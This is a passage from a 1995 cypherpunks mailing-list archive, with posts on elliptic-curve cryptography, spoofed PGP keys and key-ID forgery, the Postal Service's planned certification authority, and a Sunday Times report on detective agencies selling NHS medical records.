That elliptic curves are about the same, but the programs 
are a lot nastier.

Can someone tell me the true story?


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From doug at Eng.Auburn.EDU  Sun Nov 26 12:26:59 1995
From: doug at Eng.Auburn.EDU (Doug Hughes)
Date: Mon, 27 Nov 1995 04:26:59 +0800
Subject: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124222957.107A-100000@localhost>
Message-ID: <Pine.SUN.3.91.951126141155.15854B-100000@nexus.eng.auburn.edu>


On Fri, 24 Nov 1995, Mark M. wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Fri, 24 Nov 1995, Moroni wrote:
> 
> > 
> >     Where can one get PGP burnt into cdrom? Or the equiptment to do it
> >              Thanks in advance
> >                  moroni
> > 
> > 
> > 
> 
> I remember seeing in computer catalog a device that can burn data into a
> cdrom and it even supplies blank cd's.  Unfortunately, I cannot remember
> the name of the catalog.  It might have been _Tiger Software_ or some
> similar catalog.  I do know that the technology is available.
> 
> 
There was a recent review in network computing of about 60 or so
different CDROM recording devices. The cheapest one was about $500 from
Liberty. The most expensive was I think the one from Kodak, for about $20k.
The capabilities of each are different. Some include buffering, some don't.
However, the pre-mastering software used to make file systems on a CDROM
(HSFS, UFS, DOS, ISO-???? (forget that four digit number) is sold separately,
but generally not too expensive. There are also single and multi-session
CD 'burners'. The single session mean you have to do the entire disk in
one session, and generally if you mess up, you need a new disk. The multi-
session devices let you start a session, and pick it up with more information
at a later time.

Most of them are designed for multi-media or audio recording, but you can
generally get pre-mastering software that will work with something like
CD-XA.. etc..
 Check your software for compatibility before purchasing the hardware.

____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug at eng.auburn.edu
		Pro is to Con as progress is to congress






From root at deimos.toad.com  Sun Nov 26 12:30:59 1995
From: root at deimos.toad.com (Tom Zerucha)
Date: Mon, 27 Nov 1995 04:30:59 +0800
Subject: Cyberpunk handbook
In-Reply-To: <199511210436.UAA26114@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.951126151636.218C-100000@deimos>


The worst part of the book was the cover.  I didn't think I was a 
cyberpunk until I could check off 8 out of 10 items (I don't have a pager 
or fake security ID, but I do have a carbide scribe and library with 
similar books in similar stacks:).  To say nothing about fashion.  I am 
no longer in denial ;).

zerucha at shell.portal.com -or- 2015509 on MCI Mail
finger zerucha at jobe.portal.com for PGP key






From rah at shipwright.com  Sun Nov 26 12:44:34 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 27 Nov 1995 04:44:34 +0800
Subject: BOS_nya
Message-ID: <v02120d01acde7b8ed2d5@[199.0.65.105]>


>      What Comes Next:
>      The End of Big Government And the New Paradigm Ahead
>      By James P. Pinkerton
>      Hyperion. 404 pp. $24.95

I read a review of this book in the Standard <ducking rotten tomatoes> with
in the last week or so.

If you think *I'm* hyperjargonate, you should see how this guy does it.
Hear tell he practically invents his own language...

May be worth a read if the local library has it, though.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From rah at shipwright.com  Sun Nov 26 12:46:34 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 27 Nov 1995 04:46:34 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <v02120d05acde7ef59f48@[199.0.65.105]>


>Is this another one of those LD tentacles? ;)

Must that or a spoof of somekind... "She" didn't sign it, and "she" claims
to have issued a signature...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From rah at shipwright.com  Sun Nov 26 12:47:10 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 27 Nov 1995 04:47:10 +0800
Subject: Electronic Commerce CFP for Special Issue in _The Information Society_
Message-ID: <v02120d03acde7d0d2caa@[199.0.65.105]>



--- begin forwarded text

<many sniped mail headers later...>

Dear Colleague:

You may be interested in submitting a manuscript for review for the
following special issue on Electronic Commerce.

Rolf Wigand

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

                        CALL FOR PAPERS

          For a Special Issue on 'Electronic Commerce'

       The Information Society (An International Journal)
       --------------------------------------------------

_The Information Society (TIS)_ journal is inviting authors to submit
papers for review on the topic of 'Electronic Commmerce' for a special
issue to be edited by Rolf Wigand, Syracuse University. The paper
submission deadline is January 15, 1996.

Electronic transactions are now common place in the business and
government environment in the industrialized world.  In the United States
alone, over 50 % of all companies are exchanging data electronically while
engaging in accounting, controlling, production management, funds
transfer, record-keeping, purchasing and selling activities.  Consumers
too use various information technologies daily to buy products via their
credit cards, to transfer funds, to buy stocks, and to browse through
electronic catalogues. We are entering a new era in electronic commerce
characterized by firms and customers conducting business on the Internet
spontaneously, on a 24-hour basis and worldwide.  With the phenomenal
growth of the Internet a unique and new electronic market place is
evolving. Various estimates (ranging from 10 million to over one billion)
have been advanced in terms of the total number of people who will be
connected to computer networks as they expand to include telephones,
televisions, computers, as well as a range of intelligent devices such as
the 'market choice box'.

Electronic commerce is expected to grow in various forms such as
electronic data interchange and various multimedia services such as
interactive television and home shopping, multimedia kiosks and
cable-based video-on-demand services. Off-shoots may be desk-top
video-conferencing and computer networks affecting the way we communicate
and the overall need to travel.

When overlaying and projecting many of these and future electronic
commerce activities on the envisioned National and Global Information
Highway, it is indeed astonishing to fathom the future potential for
commerce and economic performance.  At the same time, however, we can
recognize potential social, organizational and societal limits and
dysfunctions. How is the availability and use of the Internet changing
commerce as we know it? Given many uncertainties, how can we reliably and
empirically estimate the number of potential electronic commerce users on
the Internet (in an effort to separate grounded analysis and projections from
hype)? Will electronic markets provide new areas of opportunity for
retailers, producers and consumers?  How will future traffic on the
Information Highway affect each segment of an industry value chain?  How
will such forseeable developments impact the consumer and society in
general? If electronic markets lower transaction costs for producers and
retailers, will consumers gain by accessing manufacturers directly via
market makers? What do electronic commerce developments mean from a
marketing perspective and for customer relationships? What are the impacts
of the emergence of widespread information technology use and worldwide
electronic networks (e. g., the World Wide Web) on electronic commerce and
markets in general?  Can we envision electronic forms for payment such as
digital cash on the Internet?  What may be the potential impact of
electronic cash on the economy, banks, and nations' equivalent of federal
reserve systems? What is the role of government in electronic commerce
developments and what policy directions ought to be addressed?

This special issue intends to embrace a wide and rich array of electronic
commerce issues.  We would like to focus on "commerce," not just
transactions, implying that commerce denotes a larger process including
aspects of information seeking and distribution, negotiation, trust,
risk-taking, customer relationships, buyers finding sellers, sellers finding
customers, after-sale service and support. Although we are interested in
transaction processing concerns within and between firms and within
markets, we would also like to address important and essential social and
behavioral issues in this setting, without which no effective commerce is
possible. Moreover, we are interested in work and organizational issues
embedded in electronic commerce and what they mean and imply inside the
organization.  In addition, we would like to explore how these electronic
commerce issues relate to the marketing perspective, such as in
relationships between firms and customers/clients.

_The Information Society_ journal, published since 1981, is a key forum
for thoughtful analysis of the impacts, policies, system concepts,
methodologies and cultural change related to trends that may be described
as the "information technology revolution."  It is a refereed journal
publishing scholarly articles, position papers, short communications and
book reviews.

_The Information Society_ is a multidisciplinary journal whose audiences
include policy- and decision-makers and scientists in government,
industry and education; managers concerned with the effects of the
information revolution on individuals, organizations and society; and
shcolars with an interest in the relationship between information
technologies, social/organizational life, and social change. A general
description of the journal can be found at the following URL:
        http://www.ics.uci.edu/~kling/tis.html

For this special issue on "Electronic Commerce" and, in general, _The
Information Society_ is interested in provocative analytical articles or
empirical studies that are written to advance our understanding of the
relationships among information technology, related social practices and
policies, and social change. _TIS_ articles are typically 4,000 to 6,000
words long, and are written vividly with coherent analyses and minimal
jargon.

For manuscript format details, look at the following URL:
        http://www.ics.uci.edu/~kling/tisinst.html
You may also contact the editor or see the inside back cover of an issue
of the journal. Authors of manuscripts for this issue on "Electronic
Commerce" should send
four copies to the guest editor no later than January 15, 1996:

        Rolf T. Wigand, Ph. D.
        Guest Editor, _TIS_
        School of Information Studies
        4-293 Center for Science and Technology
        Syracuse University
        Syracuse, NY 13244-4100, USA
        Telephone: +315-443-5608;  Fax: +315-443-5806
        E-Mail: rwigand at syr.edu

--- end forwarded text


-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From anonymous-remailer at shell.portal.com  Sun Nov 26 13:17:52 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 27 Nov 1995 05:17:52 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <199511262109.NAA29631@jobe.shell.portal.com>


On Sun, 26 Nov 1995, Robert Hettinga wrote:

> >Is this another one of those LD tentacles? ;)
> 
> Must that or a spoof of somekind... "She" didn't sign it, and "she" claims
> to have issued a signature...

I have never signed any of my posts to this mailing list and frankly have
no intention of beginning at this point.  No matter what some spoofer
posts, as my "key".  Whoever the dolt was who posted the "pgp key"
hopefully will begin to use it and produce something worthy of their
"signing". 

I always thought that my words spoke for themselves.

I really don't have the inclination to travel to a secured facility and 
to use a secured machine in order to reply to a message on this list, and 
I truly am not interested in issuing a new key on a daily basis.

That is reserved for something of some importance.

Frankly, this is really not worth it.  As some people might have noticed, 
I've simply closed off this communications channel.  There really is 
nothing left to say at this point.  

Or as some people might learn, "Lilies that fester, smell far worse than
weeds."  I think that was a line from a sonnet or soemthing ... not that 
it would refer to anything in particular, or anything. <g>

> Cheers,
> Bob Hettinga


Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From perry at piermont.com  Sun Nov 26 13:28:06 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 27 Nov 1995 05:28:06 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511262109.NAA29631@jobe.shell.portal.com>
Message-ID: <199511262120.QAA07595@jekyll.piermont.com>



Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> I have never signed any of my posts to this mailing list and frankly have
> no intention of beginning at this point.

Well, signed Alice posts have shown up, so we will just have to assume
that the above was a spoof and that the signed Alice posts are the
real ones, now won't we?

Perry





From anonymous-remailer at shell.portal.com  Sun Nov 26 13:43:14 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 27 Nov 1995 05:43:14 +0800
Subject: Junk E-Mail - Part 4
Message-ID: <199511262133.NAA01459@jobe.shell.portal.com>


On Thu, 23 Nov 1995, James M. Cobb wrote:

>    BRUSSELS/LONDON - SELLING - A ban on telephone "cold 
>    calling" throughout the European Union was on Tuesday 
>    approved by Euro-MPs, to the consternation of direct mar- 
>    keting and distance selling organisations.  In a move de- 
>    signed to spare people from what MEPs consider to be ir- 
>    ritating telephone calls, a key parliamentary committee 
>    voted to make prior consent from consumers obligatory 
>    before a seller can approach them by telephone. 
>  
>    The proposed ban also applies to communications by e- 
>    mail, raising fears among publishing organisations that 
>    the development of the information society in Europe could 
>    be damaged. 

I think that there are significantly different standards and expectations 
outside the borders of the United States, than inside.  Can you imagine 
the unmitigated "gall" of Euro-MPs in protecting the public rather than 
caving in to direct marketing special interest groups??

Goodness ... how archaic.

The next thing those Europeans are going to do is something really strange
and un-American, like having television commercials broadcast in between
TV programs -- broadcast only after a show is over.  Finished.

Those Europeans just might not allow commercials to be woven in between 
scenes of a 20-minute sitcom.  They might say, before and after ... and
that's it.

I mean this idea that advertising is "pollution" might start to catch on 
in certain European quarters.

> Ban fear, for we have nothing to fear but fear itself. 

Heavens, no.  Than again, I'm waiting for the day that the NY Times 
allows advertising on its op-ed page.

Or for that matter the Washington Post in its online edition.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From nanomius at netcom.com  Sun Nov 26 13:43:44 1995
From: nanomius at netcom.com (Albert Nanomius)
Date: Mon, 27 Nov 1995 05:43:44 +0800
Subject: No Subject
Message-ID: <199511262132.NAA05593@netcom6.netcom.com>



------- Forwarded Message

From: "LadyNada" <ladynada at ix.netcom.com>
To: snet-l at world.std.com
Date: Sun, 26 Nov 1995 13:26:39 +0000
Subject: Post Office to approve some internet email


- -- Area : AEN NEWS -----------------------------------------( M-BOARD.SU1 )----
  Msg#  22280                                       Date: 11-18-95  19:01      
  From: jared at alaska.net                            Read: No     Replied: No   
    To: All                                         Mark:                      
  Subj: Oh, great.  The Post Office is going to certify Internet mail.         
- -------------------------------------------------------------------------------
From: "Jared Armstrong" <jared at alaska.net>
Originally to: news at aen.org
Original Date: Sat, 18 Nov 95 18:47 EST

http://techweb.cmp.com/techweb/ia/18issue/18post.html

 > [Image]

 > Post Office offers Internet digital ID

 > Certification authority a key enabler of electronic commerce

 > By Gail Bronson

 > Side bar WASHINGTON - Come next summer, the U.S. Postal Service
 > expects to be up and running with a service that will identify
 > senders and receivers of Internet messages, a critical enabler of
 > electronic commerce.

 > Specifically, the Postal Service will operate a certification
 > authority for public-key certificates used to digitally sign
 > messages transmitted over the Internet.

 > The Postal Service expects the service to be of particular interest
 > to anyone involved in electronic commerce or electronic data
 > interchange, in which the ability to assure the identity of both
 > the sender and receiver of information can be crucial.

 > "Right now there is no way to figure out if messages on the
 > Internet have been tampered with nor is there any way to
 > authenticate the genuine identity of a sender," said Paul Raines,
 > program manager for electronic commerce at the Postal Service. "It
 > could be a dog on the other end of the Internet now for all you
 > know."

 > Limited beta tests of the Postal Service's system already are under
 > way within the federal government, at the Federal Aviation
 > Administration, Social Security and the Internal Revenue Service.

 > "We're eager to work with VeriSign [RSA Data Security Inc.
 > spin-off] and any other certification authorities to come up with
 > ways to help with cross certification," Raines said. "We're not in
 > this to compete with private companies, rather, we're trying to
 > enable [the electronic commerce] industry."

 > Some users may find the Postal Service certification authority
 > service more appealing than private alternatives because its
 > service will carry the weight of law - tampering with Internet
 > messages would be as much a crime as tampering with regular U.S.
 > mail. On the other hand, there is always the lingering concern of
 > having to deal with a federal bureaucracy.

 > The Postal Service intends to play two roles in the certification
 > business.

 > First, as a certifying service the federal agency will provide the
 > code, or public-key certificate, necessary for recipients of
 > digitally signed messages to identify the sender. This service will
 > be necessary to decrypt mail unless the two correspondents
 > previously exchanged their keys privately. Second, the Postal
 > Service will maintain a server to manage a public register of
 > public-key certificates accessible off the Internet, Raines said.

 > The Postal Service will conduct market studies to gauge demand
 > before deciding how much individuals must pay to obtain someone
 > else's public key certificate. In addition, the Postal Service will
 > sell for less than a dollar an electronic date-time stamp to prove
 > the existence of a message in a particular point in time.

 > "We're taking the same attributes of hard copy that make them
 > legally binding and transferring them to electronic
 > correspondence," Raines said.

 > The Postal Service is working with several companies, including
 > Premenos Corp., to develop the necessary software, Raines said. The
 > user agent and interface specifications for designing software to
 > interface with the Postal Service's server, however, are available
 > free to any one willing to sign a licensing agreement, Raines said.

 > Regardless of how such arrangements work themselves out, the Postal
 > Service intends to operate this business on a nonprofit,
 > self-supported basis. "We don't intend to have first-class mail
 > supporting Internet mail," Raines said.

 > Back to Current Issue

______________________________________________________
                 Jared Armstrong
              Anchorage, Alaska, USA
             Last Free Place On Earth

  jared at alaska.net    http://www.alaska.net/~jared
 For PGP  Key, Send E-Mail With Subject:Get PGP Key
______________________________________________________
                  PGP Key ID E2B22AD1
                    PGP Fingerprint
  38 C7 58 C0 C3 10 E0 9D 51 B2 F4 FA 76 04 47 87
______________________________________________________
______________________________________________________




- --- Reply to: news at aen.org
 * Origin: AEN NEWS Internet Gateway (1:231/110.1)


------- End of Forwarded Message






From anonymous-remailer at shell.portal.com  Sun Nov 26 13:59:00 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Mon, 27 Nov 1995 05:59:00 +0800
Subject: key for Alice as promised (not)
Message-ID: <199511262145.NAA02219@jobe.shell.portal.com>


On Wed, 22 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> > As an incentive for Alice to generate herself a PGP key, I hereby
> > place Alice on notice that if she doesn't sign her next post, and
> > provide a PGP key, I will create one for her, and steal all the
> > postive (?) reputation that she has developed so far.

Positive reputation??  Me??  Uhhm, thanks, I guess.

> > You have 24 hours Alice, otherwise a key gets posted to here, and to
> > the keyservers with your nym on it.
> 
> Well 24 hours have passed, and Alice remains unrepentant:

Can you imagine??  I'm simply not willing to fool myself into thinking 
that I ahve security by posting a key and using PGP.

I think that's irresponsible.

Unless, I have a secure machine dedicated to PGP *which I don't* I don't 
fool myself into thinking that I have any security, at all.

> On Tue, 21 Nov 1995, the old Alice de 'nonymous wrote:
> 
> > Alice here ...
> > 
> > No, *I* am the real Alice, and I refuse to use PGP signing.

Yep ... that's right.

> So here we go Alice's key:
> 
> Type bits/keyID    Date       User ID
> pub  1024/23292ED1 1995/11/22 Alice de 'nonymous <cypherpunks at toad.com>
>           Key fingerprint =  CA 76 81 41 54 CE E7 D6  62 EE 6D 65 EE FB A3 55

Gee, it might even help if you got the address right.  Since when is the 
list address, my address??

cypherpunks at toad.com??




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.









From black at eng.usf.edu  Sun Nov 26 14:02:32 1995
From: black at eng.usf.edu (James Black)
Date: Mon, 27 Nov 1995 06:02:32 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511260953.BAA10105@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951126164434.2346A-100000@kinks>


Hello,

On Sun, 26 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> > 	Its an excellent paper, well worth reading, but the basic
> > problem is that X.509 encrypts before signing.
> 
> You'd rather sign before encryption??
> 
> Doesn't that give you "known plain-text" to attack?  i.e. the signature.
> 
> I'm not sure whether it would or wouldn't, but I'm sure some
> cryptographers here might clear that up mighty quick -- before any more
> harm is allowed, I mean. 

  The paper suggested that you have two different keys, one for 
encryption and the other for signatures, and you don't mix the two up, so 
that way you are protecting yourself from someone forging your 
signature, but you are not letting them know what your private key is.
  Make sense?  I would suggest that you read the paper, as it is really 
an excellent document.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black at eng.usf.edu
http://www.eng.usf.edu/~black/index.html
**************************************************************************






From nobody at REPLAY.COM  Sun Nov 26 14:06:33 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 27 Nov 1995 06:06:33 +0800
Subject: Junk E-Mail - Part 4
Message-ID: <199511262156.WAA27898@utopia.hacktic.nl>


Alice:

>Heavens, no.  Than again, I'm waiting for the day that the NY Times 
>allows advertising on its op-ed page.

      It does and has for years and years, every day.
      Maybe you meant the editorial page?





From norm at netcom.com  Sun Nov 26 15:24:46 1995
From: norm at netcom.com (Norman Hardy)
Date: Mon, 27 Nov 1995 07:24:46 +0800
Subject: Elliptic curves, current status?
Message-ID: <acde968205021004b44c@DialupEudora>


At 12:07 PM 11/25/95, James A. Donald wrote:

....
>Can someone tell me the true story?

Not with any assurance. I don't trust my own knowledge yet.
I think that the opinion is that the discrete log problem is harder
with elliptic curves than for prime modulus arithmetic for numbers
of a given size. That is why you can use fewer bits.
The inner loop in some elliptic curve systems is not multiply-add
(as is the case with number fields)
but other operations that are as efficient with gates but less
efficient with normal machine instructions.

There are probably an order of magnitude more people that
have studied and published about the problems of breaking
prime modulus crypto than elliptic curves. Perhaps progress
will be faster should elliptic curves be studied by more people.
There are a lot of tricks to speed up discrete logs in for prime
modulus schemes that don't seem to work for elliptic curves.

There are many parameters to an elliptic curve crypto system.
I haven't seen any taxonomy of which kinds are good and which
have been shown to be week. In contrast there seems to be a
consensus about how to pick primes for RSA or Diffie-Hellman.

I am certainly no expert. Perhaps this will prompt comments
from someone who can point to real information.







From EALLENSMITH at ocelot.Rutgers.EDU  Sun Nov 26 15:35:26 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Mon, 27 Nov 1995 07:35:26 +0800
Subject: Cyberangels
Message-ID: <01HY3X9A4V748WYKSR@mbcl.rutgers.edu>


	Some may have already seen this, but the Guardian Angels are trying to
intrude onto the net... and are doing so in typical clueless newbie fashion.
See the CUDigest web site for more information; the links to the most
significant issues are:
http://www.soci.niu.edu/~cudigest/CUDS7/cud786 and
http://www.soci.niu.edu/~cudigest/CUDS7/cud791. Some interesting commentary
is also in http://www.soci.niu.edu/~cudigest/CUDS7/cud787. Incidentally, one
way in which they are displaying cluelessness is in taking L.Detweiler
seriously.
	-Allen





From Greg_Rose at sydney.sterling.com  Sun Nov 26 17:37:52 1995
From: Greg_Rose at sydney.sterling.com (Greg Rose)
Date: Mon, 27 Nov 1995 09:37:52 +0800
Subject: establishing trust
In-Reply-To: <199511240500.AAA07836@clark.net>
Message-ID: <pgpmoose.199511271220.42718@paganini.sydney.sterling.com>


-----BEGIN PGP SIGNED MESSAGE-----

Carl Ellison <cme at clark.net> wrote:
  Ed Carp wrote:
  >Subject: Re: crypto for porno users
  >To: khijol!clark.net!cme at uunet.uu.net (Carl Ellison)
  >Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
  >Cc: khijol!got.net!edge at uunet.uu.net, khijol!toad.com!cypherpunks at uunet.uu.n
 et
  >

  >totally different from this "web of trust" I keep hearing about - and that i
 s
  >*it*.  Do you trust me any more now than before I started signing my posting
 s?

  Actually, in my view, signed postings are the first step.  With those (and
  the right S/W (not there yet)), I get to know that a bunch of postings came
  from the same person.  I even know who they came from:  the person who
  is capable of signing with key 0xXXXXXXXX.

I hate to point this out, but that isn't true.
Anyone can create a key with any chosen keyid and
attach the same publicly known name to it. (see,
eg., the key I signed this with, given below).
The only unforgeable things about a particular
key are:

1. The key itself (you know, the product of the
primes),
2. The key fingerprint (unless MD5 is compromised)
and 
3. The web of trust leading to that key.

So, in practice, you actually have to look at the
key fingerprint of the key used to sign a message,
if you want to be sure of the uniqueness of that
key.

Or you have to only trust keys that come
well-introduced. Back to the Web of Trust.

  Since the only way I have of getting to know the person is through those
  postings, I get to know that person and through that knowledge I decide
  whether or not to trust.

I've been trying to think of the possible
ramifications of spoofing people's names and
keyids on a large scale. And a large scale is
certainly possible -- it only took me about an
hour to create this key. I was originally
intending to use this key as part of a real
project, to gain attention to the project, but the
more I thought about it the more I worried about
the implications. This "coming out" invalidates
any chance of that happening.

There are two bad things I can think of.
Suppose I want to somehow attack Fred. I can
create a key with the same ascii text associated
with it very easily. With only a little more
effort, I can also duplicate the keyid. PGP adds
new keys at the front of the keyring, so if I
start distributing this new key widely, it will
appear in keyrings before the "real" Fred's.
Whenever this happens automatically, there is some
possibility that the wrong key will be used for
some operations. PGP doesn't help much, because it
is hard to specify the key unambiguously in this
case.

PGP uses more than just the visible part of the
keyID. So at least it will choose the right key to
verify signatures, right? Maybe not. I can apply
the same spoofing technique to the whole internal
keyID, and generated a key that even PGP can't
tell is the wrong one. I think that when PGP tried
to check the signature on a message from the "real"
Fred that it would notice that it had applied the
wrong key, but I'm not absolutely sure on this
point. Anyway, an inattentive or somewhat
automated user will merely notice that the
document signature fails to check out, essentially
slurring the "real" Fred's reputation.

Any other possible attacks?

Greg.

Greg Rose               INTERNET: greg_rose at sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLkSAqaauZzerb7vAQFpbgP+KpPj1SH746nmJca3VmEGU13t/enQL5GT
FmCGHqnqI757GRNOiHMXnNe8mMdwMn67UgxU/3a7R/UU7rspGH3P/IrmDH0NnDHG
z5QuhQcutgswz7ncNeuUxi6BRHP12SM/aNnLqCmT308zd1sL1BNL/CUgPdxNBnFT
kCe5dS0FVaI=
=mopc
-----END PGP SIGNATURE-----

-----BEGIN PGP MESSAGE-----
Version: 2.6.2i

lQHgAzBrI8cAAAEEANQqR/iaxVP8FZ5CKqI2hcYFFyWAsnNmsZsPi+nOehI1nMyi
PBzX1PPBh8pCAS+0mrUqKKUp2ArCS6n6Ph/R2VjHsqq8HFKOT14Md3C6/M15SKDV
ODcgKvfZf7gs6KEhPqcCS1P8OpGQWRczE1nTxYAw65bBRpDg7KaauZzerb7vAAUR
Adj6LAUodVxLA/4dxjQlaNqaJp5ElB0amAQ81/9Zah4Zf1j8CLVw08g5Kz4oK3hJ
dx61pjBJ2fag1/UUM6y9gIT5yL0ErK+KQ1sPdvZPe5p5JEhCV2tlqlT+d1iPdEiN
x7t986et7Zb91T+UsEyLLaTxQMKk4obDb2IvJvKgcvNm+wRW5rGNXitpRQIAGmTd
ypkNQIwWq07d+QNaFUYgTl8ZQfX078a6VMPl2DQni6uLmvUvgI3VHW8oTcpyqu5j
mJt0FTkeGMA0lKQa5AIA//fzyVUXGJEKkXIBkfCJ/F1V4dMsfZ/3z73RiNtKl46p
lMTztn/cCEUoE+GwonQhkJUnAXbBYtFifisyVf92ngH/u7YxY+z4T2SrhsYj+oGc
Ox/T2VlugUYPowQr3070OoHrrd7icwXNU69nHkle7/jnFjMTvDSZrPYZiXFa0yhV
0apCtBBQcmltZSBSaWIgTG92ZXJziQCVAwUQMLkLB6aauZzerb7vAQEHyAQApGgP
xyUR71jntGeir3yJpcBAEVkmqXLYZPb83dzVlWh7HHQmTiyE/rrcJT7NZRZGA8X7
TTPMZnITDETdwFVIkznvY8v7DWGXD8SD0LNlE61lzhmhNvsfUmQ/q4YHrCERb31P
56TPaveSwYlkPanOYLLJ7m47KICP0z3jzNgwqRo=
=DLC7
-----END PGP MESSAGE-----





From ilaccr at sol.racsa.co.cr  Sun Nov 26 18:32:39 1995
From: ilaccr at sol.racsa.co.cr (Instituto Latinoamericano de Computacion)
Date: Mon, 27 Nov 1995 10:32:39 +0800
Subject: No Subject
Message-ID: <9511261423.AA01203@sol.racsa.co.cr>


Hey What's up,my name is Herbert Salas,I live in Costa Rica,I would like to know
everything you can about hacking.I've tried to find here something,but I
can't find anything here,how they do to encrypt things,and how can you crack
it,what do I need,Software,Hardware,Where can I get it.??Help.
Thanks.
Herbert Salas






From nobody at REPLAY.COM  Sun Nov 26 19:52:36 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 27 Nov 1995 11:52:36 +0800
Subject: For sale: your secret medical records
Message-ID: <199511270120.CAA06893@utopia.hacktic.nl>



The Sunday Times, Top page one, 26 Nov 1995

For sale: your secret medical records for L150

by Lois Rogers and David Leppard

Confidential medical records of politicians, celebrities
and millions of other National Health Service patients
can be bought on the information black market for L150.

The contents of the files comprising patients' most
personal health details dating back 30 years, are being
sold to order by high-street detective agencies
advertising in the Yellow Pages.

The Sunday Times has discovered that GP practices across
Britain are failing to safeguard files which contain
sexual, mental and physical histories of patients. Files
on sale last week revealed how named patients had
vasectomy operations, or had a family history of
Alzheimer's disease and precancerous growths. They also
included the type and dose of medication prescribed,
visits to casualty units, and injuries suffered in road
accidents.

The disclosures have prompted calls by opposition MPs and
doctors' leaders for urgent laws to protect the security
of the health records of Britain's 56.5m patients.

Alan Milburn, a Labour health spokesman, said he would be
asking Stephen Dorrell, the health secretary, to conduct
an urgent inquiry. "This is a violation of the special
relationship between doctors and their patients," said
Milburn. "I find it disturbing and deeply sinister.
Patients will be horrified to learn that their records
can be accessed by unknown organisations."

Alex Carlisle, the Liberal Democrat home affairs
spokesman and a lay member of the General Medical
Council, said: "It is ethically and morally outrageous
that organisations of any kind should obtain details like
that without consent. It is contrary to everything we are
told about the confidentiality of medical records. This
should be a crime punishable by imprisonment."

Milburn and Carlile were among more than a dozen people
who last week allowed The Sunday Times to expose the
security failures in the NHS records system by giving the
newspaper permission to access their confidential files
through commercial agencies.

The problem first came to light when one agency said it
was receiving more and more commissions from big
employers who wanted it to carry discreet checks on the
medical backgrounds of their employees. The agencies,
many of which advertise "private searches" in the Yellow
Pages, offer their services for fees ranging from L150 to
L800.

They offer to provide a written summary of anybody's
complete medical files within three hours. All they
require is the name, address and date of birth of the
patient they are investigating. They are thought to be
able to obtain the records by impersonating medical staff
and persuading them to disclose contents of the NHS files
over the telephone.

Last week a Sunday Times reporter posing as a prospective
client contacted 10 private detective agencies chosen at
random from the Yellow Pages. "Most of this stuff is on
manual records," said one employee of a London agency.
"It is pretty well protected. We're not officially
allowed [to do this] but it's perfectly possible." A
second private investigator said: "It's just a question
of knowing who and what to ask."

However, most declined to discuss the methods they used.
"What we are doing is illegal, and I'm not going into the
details over the telephone," said another agent in
Robertsbridge, East Sussex.

Dr Sandy Macara, chairman of the British Medical
Association council, which represents 105,000 doctors,
was among those who agreed to take part in the exercise.
Details of his medical and surgical history were provided
after a brief telephone call by a reporter to a private
agency. The information was faxed to the newspaper within
three hours, after a price of L150 was quoted. "This is
incredible. I cannot imagine how they have got this
information," Macara said.

The ease with which the health files could be obtained
posed a threat to the Electronic Patients' Records, a new
